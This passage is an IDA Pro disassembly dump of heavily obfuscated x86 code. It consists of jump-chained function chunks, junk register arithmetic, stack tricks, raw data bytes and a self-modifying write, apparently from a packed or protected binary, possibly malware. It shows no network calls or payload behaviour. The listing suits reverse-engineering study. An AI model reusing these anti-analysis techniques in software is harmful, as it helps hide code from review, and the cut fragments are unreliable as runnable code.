loc_44DA44:				; CODE XREF: sub_454539-F712j
		jmp	loc_44B6CC
; END OF FUNCTION CHUNK	FOR sub_454539
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_397. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445568

loc_44DA4A:				; CODE XREF: sub_445568-9DADj
		jmp	loc_452DCF
; END OF FUNCTION CHUNK	FOR sub_445568
; ---------------------------------------------------------------------------

locret_44DA4F:				; CODE XREF: y2kk37jd:0045615Ej
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DED9

loc_44DA50:				; CODE XREF: sub_44DED9-A5A1j
		jmp	loc_45BC64
; END OF FUNCTION CHUNK	FOR sub_44DED9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F5C5

loc_44DA55:				; CODE XREF: sub_43F5C5+12j
		jmp	loc_457380
; END OF FUNCTION CHUNK	FOR sub_43F5C5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445E1C

loc_44DA5A:				; CODE XREF: sub_445E1C:loc_449390j
					; y2kk37jd:00458411j
		add	esi, 5BF7D90Dh
		and	esi, 0D78A5ADEh
		or	esi, 0DAA1B0E2h
		add	esi, 2197E826h
		push	offset sub_44F984
		jmp	loc_442A7A
; END OF FUNCTION CHUNK	FOR sub_445E1C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_218. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_44DA7D	proc near		; DATA XREF: sub_4513DBo

var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		push	ecx
		mov	[ebp+var_4], eax
		push	offset loc_453BBC
		jmp	nullsub_78
sub_44DA7D	endp

; ---------------------------------------------------------------------------

loc_44DA8E:				; CODE XREF: y2kk37jd:00455580j
		pop	esi
		or	edi, 3E705341h
		test	edi, ebx
		jmp	loc_44CA21
; ---------------------------------------------------------------------------
		db  68h	; h
		db  92h	; 
		db  4Eh	; N
		db  45h	; E
		db    0
		db 0E9h	; 
		db  8Ch	; 
		db  15h
		db 2 dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_44DAA6	proc near		; CODE XREF: sub_44615F+F778p
					; y2kk37jd:00455C11j

; FUNCTION CHUNK AT 00459AAB SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		cmp	ax, 0A5B3h
		jnz	loc_4558C7
		jmp	loc_459AAB
sub_44DAA6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_44DAB9:				; CODE XREF: sub_4448E2:loc_44B651j
		and	esi, 92822420h
		xor	esi, ds:4000EBh
		rol	esi, 1
		add	esi, 0E062358Ah
		jmp	loc_45C66A
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_44DAD2:				; CODE XREF: sub_453867:loc_45A5D5j
		mov	ebp, edi
		pop	edi
		retn
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455556

loc_44DAD6:				; CODE XREF: sub_455556:loc_4586D9j
		mov	eax, [ebp-4]
		mov	[ebp-0Ch], eax
		jmp	loc_43DBE8
; END OF FUNCTION CHUNK	FOR sub_455556

; =============== S U B	R O U T	I N E =======================================



sub_44DAE1	proc near		; CODE XREF: sub_43BD49:loc_446FCFp
					; y2kk37jd:loc_4501F1p	...

; FUNCTION CHUNK AT 00441864 SIZE 0000000A BYTES

		js	sub_43D522
		jmp	loc_441864
sub_44DAE1	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44DAEC:				; CODE XREF: sub_445226+1B9j
		jno	loc_45605B
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_4440CC
		jmp	loc_442D8D
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_44DB06:				; CODE XREF: sub_4458DD:loc_456857j
		jns	loc_43F743
		jmp	loc_43ED9F
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44753E

loc_44DB11:				; CODE XREF: sub_44753E:loc_45498Cj
		jnz	loc_4403F1
		add	esi, ebp
		jmp	loc_4403E3
; END OF FUNCTION CHUNK	FOR sub_44753E
; ---------------------------------------------------------------------------
		or	edx, 898BEF73h
		xchg	ecx, edx
		jmp	sub_458C59
; ---------------------------------------------------------------------------

loc_44DB2B:				; DATA XREF: y2kk37jd:0045C54Fo
		push	eax
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455DD8

loc_44DB2D:				; CODE XREF: sub_455DD8-181C4j
		jmp	nullsub_194
; END OF FUNCTION CHUNK	FOR sub_455DD8

; =============== S U B	R O U T	I N E =======================================



sub_44DB32	proc near		; CODE XREF: y2kk37jd:0043DD95p
					; sub_43BD0D+A1D5p ...

; FUNCTION CHUNK AT 0044EC17 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045BDC5 SIZE 0000000D BYTES

		jno	loc_44EC17
		push	ebp
		mov	ebp, esp
		jmp	loc_45BDC5
sub_44DB32	endp


; =============== S U B	R O U T	I N E =======================================



sub_44DB40	proc near		; DATA XREF: y2kk37jd:0043B878o

; FUNCTION CHUNK AT 00449150 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00453AB6 SIZE 00000011 BYTES

		push	3329111h
		pop	ecx
		rol	ecx, 10h
		add	ecx, 1471F030h
		jmp	loc_453AB6
sub_44DB40	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449129

loc_44DB54:				; CODE XREF: sub_449129+FA4j
		call	sub_44884D
		call	nullsub_9

loc_44DB5E:				; CODE XREF: sub_4508C4-82CDj
					; sub_4567FD-76CEj
		mov	eax, ds:dword_449C24
		mov	[ebp-4], eax
		call	sub_442002
; END OF FUNCTION CHUNK	FOR sub_449129
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_44DB6B:				; CODE XREF: sub_44610D-3E76j
		jmp	nullsub_80
; END OF FUNCTION CHUNK	FOR sub_44610D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B276

loc_44DB70:				; CODE XREF: sub_43B276+15j
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_43B276
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441F5E

loc_44DB75:				; CODE XREF: sub_441F5E+D0Ej
		xor	ebx, ecx
; END OF FUNCTION CHUNK	FOR sub_441F5E

; =============== S U B	R O U T	I N E =======================================



sub_44DB77	proc near		; CODE XREF: y2kk37jd:00445FFAp

var_4		= dword	ptr -4

		xchg	eax, [esp+0]
		pop	eax
		xor	eax, 71C2F3BCh
		push	edi
		push	6911FC83h
		xchg	esi, [esp+4+var_4]
		mov	edi, esi
		jmp	loc_444F57
sub_44DB77	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EA91

loc_44DB91:				; CODE XREF: sub_44EA91:loc_45A342j
		mov	ebp, esp
		push	offset loc_44C29E
		jmp	nullsub_498
; END OF FUNCTION CHUNK	FOR sub_44EA91
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_44DB9D:				; CODE XREF: sub_453867-D3CFj
		cmp	edx, 8D3C3FFDh
		jmp	loc_450DE9
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45447D

loc_44DBA8:				; CODE XREF: sub_45447D+14j
		jz	loc_4436A4
		jmp	loc_44AD3F
; END OF FUNCTION CHUNK	FOR sub_45447D

; =============== S U B	R O U T	I N E =======================================



sub_44DBB3	proc near		; DATA XREF: sub_459318:loc_459322o
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_497
sub_44DBB3	endp

; ---------------------------------------------------------------------------
		db 5Ah
		dd 5224048Bh, 0FFED1EE8h
		db 0FFh
; ---------------------------------------------------------------------------

loc_44DBC5:				; CODE XREF: y2kk37jd:004536A5j
		or	esi, edx

; =============== S U B	R O U T	I N E =======================================



sub_44DBC7	proc near		; CODE XREF: y2kk37jd:0044D645p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043B5A4 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		add	ebx, 0F73E8027h
		xchg	ebx, [esp-4+arg_0]
		jmp	loc_43B5A4
sub_44DBC7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44DBD9:				; CODE XREF: y2kk37jd:loc_45C354j
		cmp	ebp, esi
		jmp	loc_444525
; ---------------------------------------------------------------------------

locret_44DBE0:				; CODE XREF: y2kk37jd:0044BFEBj
		retn
; ---------------------------------------------------------------------------

loc_44DBE1:				; CODE XREF: y2kk37jd:0044A5C0j
		jmp	loc_43FEBD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_379. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B03F

loc_44DBE7:				; CODE XREF: sub_44B03F+533Bj
		jmp	loc_44BC6F
; END OF FUNCTION CHUNK	FOR sub_44B03F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4439EE

loc_44DBEC:				; CODE XREF: sub_4439EE+19j
		jmp	loc_445C20
; END OF FUNCTION CHUNK	FOR sub_4439EE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44866D

loc_44DBF1:				; CODE XREF: sub_44866D:loc_4459C7j
		add	edx, ebx
		jmp	loc_447EDE
; END OF FUNCTION CHUNK	FOR sub_44866D

; =============== S U B	R O U T	I N E =======================================



sub_44DBF8	proc near		; CODE XREF: y2kk37jd:004458A4j
					; sub_43ED19:loc_44F59Ap

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043EE42 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043F5B0 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 00440A1A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044286B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004440D4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449CE0 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044B8D3 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044C527 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044E657 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450430 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450604 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00451DA6 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004522B8 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00453CD9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453CE8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045701C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045702C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00457D8F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00458D82 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045ACF3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B459 SIZE 0000000B BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	3278033Ch
		xchg	ecx, [esp+0]
		mov	eax, ecx
		pop	ecx
		rol	eax, 16h
		or	eax, 283ED219h
		jmp	loc_44286B
sub_44DBF8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AFF6

loc_44DC15:				; CODE XREF: sub_44AFF6:loc_449C4Aj
		popf
		and	ebp, 913BE08Dh
		test	edi, edx
		jmp	loc_44A40A
; END OF FUNCTION CHUNK	FOR sub_44AFF6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E07B

loc_44DC23:				; CODE XREF: sub_43E07B+1C0Bj
		push	eax
		ror	eax, 0Fh
		mov	ds:dword_4516C8, eax
		jmp	loc_446821
; END OF FUNCTION CHUNK	FOR sub_43E07B

; =============== S U B	R O U T	I N E =======================================



sub_44DC32	proc near		; CODE XREF: sub_45AC4Bj

; FUNCTION CHUNK AT 004519BA SIZE 0000000A BYTES

		push	ebp
		jmp	loc_4519BA
sub_44DC32	endp


; =============== S U B	R O U T	I N E =======================================



sub_44DC38	proc near		; CODE XREF: y2kk37jd:00442A17j
					; y2kk37jd:00445C93p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch
arg_14		= dword	ptr  18h

; FUNCTION CHUNK AT 00442C37 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004435D5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445F97 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00447737 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448B60 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004495C2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004503D2 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004573E2 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00457909 SIZE 00000005 BYTES

		xchg	ebx, [esp-8+arg_4]
		pop	ebx
		xchg	ebp, [esp-0Ch+arg_8]
		push	ecx
		jnz	loc_448B60
		jmp	loc_4495C2
sub_44DC38	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44DC4B:				; DATA XREF: sub_44D51F+DEA9o
		mov	al, [ebp-9]
		shl	eax, cl
		mov	cl, [ebp-0Bh]
		xor	edx, edx
		mov	dl, [ebp-9]
		jmp	loc_458B27
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445787

loc_44DC5D:				; CODE XREF: sub_445787j
		push	offset loc_443E86
		jmp	sub_447F2E
; END OF FUNCTION CHUNK	FOR sub_445787
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_44DC67:				; CODE XREF: sub_4411C3+8B8Dj
					; sub_4411C3:loc_44BB77j
		xor	ecx, 53BE952Fh
		xor	eax, ecx
		pop	ecx
		mov	edx, [esp+4+var_4]
		push	eax
		jmp	loc_4403C3
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
		jmp	ds:dword_41E1B4
; ---------------------------------------------------------------------------

loc_44DC7F:				; CODE XREF: y2kk37jd:0044D6D2j
		jmp	loc_45199A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_455. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		sub	al, 24h
		mov	edx, ebp
		pop	ebp
		jmp	loc_440C0A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44DC8F:				; CODE XREF: sub_445226:loc_457EFDj
		jz	loc_452595
		jmp	loc_43C527
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4443CD

loc_44DC9A:				; CODE XREF: sub_4443CD:loc_44E4F0j
		pop	eax
		sub	eax, 43243A5Ch
		xor	eax, 0C08A0201h
		add	eax, 0A8BC976Bh
		xchg	eax, [esp+0]
		jmp	sub_4448E2
; END OF FUNCTION CHUNK	FOR sub_4443CD
; ---------------------------------------------------------------------------

locret_44DCB5:				; CODE XREF: y2kk37jd:0043C13Cj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454D0F

loc_44DCB6:				; CODE XREF: sub_454D0F:loc_4550B3j
		jmp	loc_45351A
; END OF FUNCTION CHUNK	FOR sub_454D0F
; ---------------------------------------------------------------------------

loc_44DCBB:				; CODE XREF: y2kk37jd:00454DC2j
		jmp	loc_4433E0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44314E

loc_44DCC0:				; CODE XREF: sub_44314E-4507j
		push	offset loc_45C54C
		jmp	nullsub_303
; END OF FUNCTION CHUNK	FOR sub_44314E
; ---------------------------------------------------------------------------
		push	ebx
		push	1452952Eh
		pop	ebx
		and	ebx, 6445EB6Ah
		add	ebx, 9EE412E3h
		jmp	loc_450732
; ---------------------------------------------------------------------------

loc_44DCE2:				; DATA XREF: sub_445226:loc_445512o
		pop	edx
		jnz	loc_44C381
		mov	eax, [esp]
		push	edx
		jmp	loc_445C26
; ---------------------------------------------------------------------------

loc_44DCF2:				; DATA XREF: sub_43BDF4:loc_44C13Bo
		or	eax, eax
		jnz	loc_4571D4
		jmp	loc_44DFE9
; ---------------------------------------------------------------------------
		mov	ds:dword_44D2B4, eax

loc_44DD04:				; CODE XREF: y2kk37jd:00456E2Aj
		lea	eax, [ebp-14h]
		xor	edx, edx
		call	sub_4581BB
; START	OF FUNCTION CHUNK FOR sub_444E83

loc_44DD0E:				; CODE XREF: sub_444E83+Dj
					; sub_45742F-3A2Aj
		mov	eax, ds:dword_44D2B4
		push	edi

loc_44DD14:				; CODE XREF: y2kk37jd:0043F416j
		push	0F06671B3h
		pop	edi
		jmp	loc_450426
; END OF FUNCTION CHUNK	FOR sub_444E83
; ---------------------------------------------------------------------------
		adc	edi, 509CD968h
		test	ebp, 0E4E30E2Fh
		jmp	loc_4537B6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443360

loc_44DD30:				; CODE XREF: sub_443360:loc_45227Cj
		jz	loc_458A0B
		jmp	loc_441C93
; END OF FUNCTION CHUNK	FOR sub_443360
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C7B9

loc_44DD3B:				; CODE XREF: sub_43C7B9+1AA5Dj
		or	edx, 0A7058800h
		and	edx, 633312F2h
		xor	edx, 0EF814088h
		call	sub_440CD1
		push	eax
		ror	eax, 13h
		mov	ds:dword_44D2F8, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_43C7B9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442A84

loc_44DD5D:				; CODE XREF: sub_442A84-E11j
		jmp	loc_44095C
; END OF FUNCTION CHUNK	FOR sub_442A84
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44606C

loc_44DD62:				; CODE XREF: sub_44606C+2449j
		pop	ecx

loc_44DD63:				; CODE XREF: sub_44606C:loc_4484AAj
		rol	esi, 0Eh
		xor	esi, 8640202h
		add	eax, esi
		pop	esi
		jmp	loc_44D064
; END OF FUNCTION CHUNK	FOR sub_44606C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D6BF

loc_44DD74:				; CODE XREF: sub_44D6BF+8j
		jz	loc_448D38
		jmp	loc_450169
; END OF FUNCTION CHUNK	FOR sub_44D6BF
; ---------------------------------------------------------------------------
		db 89h
		dd 25F8E90Ah, 880FFFFFh, 0FFFF55E9h, 0FF7B39E9h
		db 0FFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44516F

loc_44DD91:				; CODE XREF: sub_44516F+11j
		call	sub_442C3E
		push	ebx
		push	0FEE99581h
		xchg	esi, [esp+0]
		mov	ebx, esi
		pop	esi
		jmp	loc_443090
; END OF FUNCTION CHUNK	FOR sub_44516F
; ---------------------------------------------------------------------------

loc_44DDA7:				; CODE XREF: y2kk37jd:0045A50Ej
		popf
		jge	loc_44EE0B
; START	OF FUNCTION CHUNK FOR sub_44BD20

loc_44DDAE:				; CODE XREF: sub_44BD20:loc_45A4F7j
		sub	ecx, 96607380h
		add	ecx, 0CF6E40Ch
		xchg	ecx, [esp+0]
		jmp	sub_44113A
; END OF FUNCTION CHUNK	FOR sub_44BD20
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_111. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44DDC3:				; CODE XREF: y2kk37jd:0044A1CEj
		jmp	loc_45BA58
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442081

loc_44DDC8:				; CODE XREF: sub_442081+185Cj
		jmp	loc_4528AC
; END OF FUNCTION CHUNK	FOR sub_442081
; ---------------------------------------------------------------------------
		add	eax, ecx
		jmp	sub_44D56D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AC8D

loc_44DDD4:				; CODE XREF: sub_45AC8D:loc_449576j
		jl	loc_44219D
; END OF FUNCTION CHUNK	FOR sub_45AC8D
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_44DDDA:				; CODE XREF: sub_44113A:loc_455233j
					; sub_44B814:loc_456E6Cj
		jmp	loc_44822F
; END OF FUNCTION CHUNK	FOR sub_44113A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45220C

loc_44DDDF:				; CODE XREF: sub_45220C+8j
		jmp	nullsub_124
; END OF FUNCTION CHUNK	FOR sub_45220C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44DDE4:				; CODE XREF: sub_445226+7914j
		jmp	loc_43C9B3
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		push	746EE995h
		cmp	edi, esi
		jmp	loc_442197
; ---------------------------------------------------------------------------
		xor	ebp, ecx
		jmp	loc_43FEF9
; ---------------------------------------------------------------------------

loc_44DDFC:				; DATA XREF: y2kk37jd:004501CBo
		call	sub_442C3E
		mov	ds:dword_41E170, eax
		call	sub_4468BE
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_44DE0C:				; CODE XREF: sub_43BD0D+2C03j
		jmp	loc_43BEBC
; END OF FUNCTION CHUNK	FOR sub_43BD0D
; ---------------------------------------------------------------------------

loc_44DE11:				; CODE XREF: y2kk37jd:00443CF5j
		jb	loc_440802
		sub	esi, ebx
		ror	edx, 1Bh
		jmp	loc_45654C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458DD9

loc_44DE21:				; CODE XREF: sub_458DD9-11B24j
		push	eax
		mov	eax, edx
		call	sub_4448E2

loc_44DE29:				; CODE XREF: sub_456F5B+Ej
		call	sub_44594E
; END OF FUNCTION CHUNK	FOR sub_458DD9
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_44DE2E:				; CODE XREF: sub_43F911+15E9Fj
		jns	loc_452BC0

loc_44DE34:				; CODE XREF: y2kk37jd:0043B79Fj
					; y2kk37jd:004481ACj ...
		jmp	sub_459ADE
; END OF FUNCTION CHUNK	FOR sub_43F911
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44DE39:				; CODE XREF: y2kk37jd:00440A88j
					; sub_445226+A9E6j
		pop	ecx
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_44DE3C:				; CODE XREF: sub_43ED19+1CD0Dj
		jmp	loc_449D92
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED86

loc_44DE41:				; CODE XREF: sub_43ED86+1BF8Aj
		jmp	sub_458DD9
; END OF FUNCTION CHUNK	FOR sub_43ED86
; ---------------------------------------------------------------------------

loc_44DE46:				; CODE XREF: y2kk37jd:0044C8C8j
		jg	loc_448D28

; =============== S U B	R O U T	I N E =======================================



sub_44DE4C	proc near		; CODE XREF: sub_4439EE+127E3p

; FUNCTION CHUNK AT 00457CAC SIZE 00000023 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	ebp
		mov	ebp, eax
		jmp	loc_457CAC
sub_44DE4C	endp

; ---------------------------------------------------------------------------

loc_44DE58:				; DATA XREF: sub_458834:loc_43E24Ao
		mov	eax, [esp]
		push	edx
		nop
		push	0AD6DDF48h
		pop	eax
		jmp	loc_45C580
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED32

loc_44DE68:				; CODE XREF: sub_43ED32+E630j
		jnz	loc_44DE77
		add	dword ptr [ebp-8], 4
		jmp	loc_43ED42
; ---------------------------------------------------------------------------

loc_44DE77:				; CODE XREF: sub_43ED32:loc_44DE68j
		add	dword ptr [ebp-8], 2
		jmp	loc_45ACFF
; END OF FUNCTION CHUNK	FOR sub_43ED32

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_44DE80	proc near		; CODE XREF: sub_44D302+41AFp
					; sub_44D302+E7A3p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00453922 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459E5F SIZE 00000023 BYTES

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFFF8h
		mov	[ebp+var_4], eax
		call	sub_4532F4

loc_44DE8E:				; CODE XREF: sub_43ED19-21DAj
		jmp	loc_459E5F
sub_44DE80	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_170. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AAAA

loc_44DE94:				; CODE XREF: sub_45AAAA-1C693j
		jmp	loc_453372
; END OF FUNCTION CHUNK	FOR sub_45AAAA
; ---------------------------------------------------------------------------

loc_44DE99:				; CODE XREF: y2kk37jd:00454C55j
		jz	loc_43C651

; =============== S U B	R O U T	I N E =======================================



sub_44DE9F	proc near		; CODE XREF: sub_447423-4D9Cp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00440727 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00443140 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00444E2D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004450A8 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00446F55 SIZE 00000023 BYTES

		xchg	eax, [esp+0]
		pop	eax
		xchg	esi, [esp-4+arg_0]
		jmp	loc_444E2D
sub_44DE9F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	ecx, 2172E29Bh
		push	5C9C0143h
		jmp	sub_44610D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E2D2

loc_44DEBA:				; CODE XREF: sub_443BAF-39F5j
					; sub_43E2D2:loc_455E29j
		mov	al, [ebp-5]
		pop	ecx
		pop	ecx
		pop	ebp
		jmp	loc_443045
; END OF FUNCTION CHUNK	FOR sub_43E2D2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445568

loc_44DEC5:				; CODE XREF: sub_445568+4ED6j
		jle	sub_44438E
		shr	ebx, 16h
		test	edi, 6DB7912Eh
		jmp	loc_43E092
; END OF FUNCTION CHUNK	FOR sub_445568

; =============== S U B	R O U T	I N E =======================================



sub_44DED9	proc near		; CODE XREF: sub_44107E:loc_445F41p
					; y2kk37jd:00449F20j

; FUNCTION CHUNK AT 0043B635 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441400 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 00443922 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00443933 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00445821 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445DD4 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00446D28 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004482F8 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044DA28 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044DA50 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EBAE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EBC9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004522AD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455458 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045797B SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045A434 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045BC64 SIZE 0000000D BYTES

		xchg	edx, [esp+0]
		pop	edx
		call	sub_4577FE
		test	al, al
		jz	loc_455458
		jmp	loc_445821
sub_44DED9	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441C78

loc_44DEEF:				; CODE XREF: sub_441C78+16j
		rol	edi, 13h
		add	edi, 0FC3D1B75h
		xchg	edi, [esp-8+arg_4]
		jmp	sub_4513DB
; END OF FUNCTION CHUNK	FOR sub_441C78
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44023C

loc_44DF00:				; CODE XREF: sub_44023C+16914j
		call	sub_43C0A5
		xchg	esi, [esp+4+var_4]
		mov	edx, esi
		xchg	ecx, [esp+4+var_4]
		jmp	loc_458586
; END OF FUNCTION CHUNK	FOR sub_44023C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EAA8

loc_44DF12:				; CODE XREF: sub_43EAA8:loc_43EAB6j
		jz	loc_43B74E
		jmp	loc_444A1F
; END OF FUNCTION CHUNK	FOR sub_43EAA8

; =============== S U B	R O U T	I N E =======================================



sub_44DF1D	proc near		; DATA XREF: sub_44610D-3A7Fo

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043E09F SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043E818 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00442428 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448F0B SIZE 00000020 BYTES
